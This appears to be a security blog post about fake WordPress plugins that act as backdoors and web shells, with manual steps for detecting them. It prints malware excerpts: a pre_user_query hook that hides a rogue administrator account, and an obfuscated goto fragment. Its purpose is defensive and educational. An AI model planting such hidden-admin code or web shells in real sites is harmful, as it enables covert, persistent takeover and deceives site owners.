Hidden Backdoors & Fake Plugins: How Hackers Live in Your WordPress Dashboard
When you log into your WordPress dashboard and look at your “Plugins” list, you trust what you see. You see Yoast SEO, WooCommerce, and Contact Form 7. Everything looks normal.
But what if I told you that you might have 15 plugins installed, but WordPress is only showing you 14?
In our recent security investigations, we have seen a massive rise in Fake Hidden Plugins. These are malicious scripts that disguise themselves as legitimate software. They don’t just sit there; they act as Backdoors and Web Shells, giving hackers total control over your website while remaining completely invisible to you.
In this post, I’m going to show you exactly how these fake plugins work, look at the code behind them (specifically wp-compat.php and OperationGraph.php), and teach you how to spot them.
1. The Disguise: “Wolves in Sheep’s Clothing”
Hackers know that if they name a malicious file hacker-script.php, you will delete it immediately. So, they use Social Engineering. They name their folders and files to sound incredibly boring and technical.
Here are three real examples we found in a recent cleanup:
- The Name: “WP Compatibility Patch” (
wp-compat.php) - The Name: “OperationGraph Framework” (
OperationGraph.php) - The Name: “Advanced Server Response Handler” (
main.php)
To a non-technical site owner, these sound like essential system files. You might even be afraid to delete them, thinking you’ll break your site. That is exactly what the hacker wants.
2. The Backdoor: The “Ghost Admin” Trick
The most dangerous type of fake plugin is the Backdoor. A backdoor is simply a secret way to get back into a system after being kicked out.
The malware file wp-compat.php is a masterclass in this. It doesn’t hack your site; it keeps your site hacked.
How It Works
Most site owners think that if they get hacked, they just need to change their password. But wp-compat.php has a nasty trick. It creates its own Administrator account (often named adminbackup or support_user), but then it tells WordPress to hide that user from you.
The Code Analysis:
Look at this snippet from the malware:
add_action('pre_user_query', function($query) {
if (!is_admin()) return;
$hidden_id = get_option('_pre_user_id');
// SQL Injection to hide the user
$query->query_where .= " AND {$wpdb->users}.ID != " . intval($hidden_id);
});In plain English:
- The script creates a malicious admin user.
- It saves that user’s ID in the database.
- It hooks into the WordPress database query (
pre_user_query). - It tells the database: “When the site owner asks for a list of users, give them everyone EXCEPT this specific ID.”
You could be staring at your “All Users” screen, seeing 3 admins, while a 4th invisible admin is logged in simultaneously, uploading more viruses.
3. The Web Shell: Remote Control Obfuscation
While wp-compat.php is about access, OperationGraph.php is about Control. This script acts as a Web Shell.
A Web Shell is a script that allows a hacker to execute commands on your server remotely, just like they were sitting in front of your server’s terminal.
The Code: Obfuscation
If you open this file, you won’t see clean code. You will see a mess. This is called Obfuscation. Hackers use it to confuse security scanners and humans.
Example from the file:
goto r9Ie9y353w0aV7bK;
eaa_xUioLZDbkthT:
register_deactivation_hook(__FILE__, function () { ... });Legitimate plugins almost never use goto commands or random strings like \x6e\x69.... If you see a PHP file that looks like a cat walked across a keyboard, it is almost certainly a Web Shell.
What The Shell Does:
This script connects to a “Command and Control” (C2) server. It waits for instructions. The hacker can send a command to:
- Inject SEO spam links into your footer.
- Redirect your traffic to a scam site.
- Send thousands of spam emails using your server.
- Delete your entire database.
Because the code is “obfuscated,” simple virus scanners often miss it because they can’t read the hidden keywords inside the mess.
4. How to Detect Hidden Plugins (Manual Audit)
Since these plugins hide from the WordPress dashboard, you cannot find them by logging into your admin panel. You must go “under the hood.”
Step 1: Access the File Manager
Log in to your hosting CPanel or use FTP (FileZilla). Go to the folder:
/wp-content/plugins/
Step 2: Look for “The Usual Suspects”
Scan the folder names. Legitimate plugins usually have branded names (e.g., elementor, contact-form-7). Malware often uses generic names mixed with “WP” or “WooCommerce”:
wp-compatwp-frameworkwoocommerce-viewassets-manager
Step 3: Check the “Last Modified” Date
This is the easiest giveaway.
If all your legitimate plugins were updated 2 months ago, but one folder says it was modified yesterday, investigate that folder immediately.
Step 4: Check the mu-plugins Folder
Go up one level to /wp-content/mu-plugins/.
“MU” stands for “Must Use.” Plugins in this folder run automatically and are not listed in the standard plugin list. Hackers love this folder. If you see files here that you didn’t put there (like loader.php or index.php), they are likely malicious.
5. Summary & Prevention
Hidden plugins are scary because they persist. You can change your passwords 10 times, but if the wp-compat.php file is still on your server, the hacker can walk right back in.
Your Action Plan:
- Don’t trust the Dashboard: If you suspect a hack, check the files via FTP.
- Delete weird users: Check your database (
wp_userstable) via phpMyAdmin for users you don’t recognize. - Disable File Editing: Add
define('DISALLOW_FILE_EDIT', true);to yourwp-config.phpfile so hackers can’t easily upload these scripts.
Security is about layers. Understanding how these backdoors work is the first layer of defense in keeping your site safe.
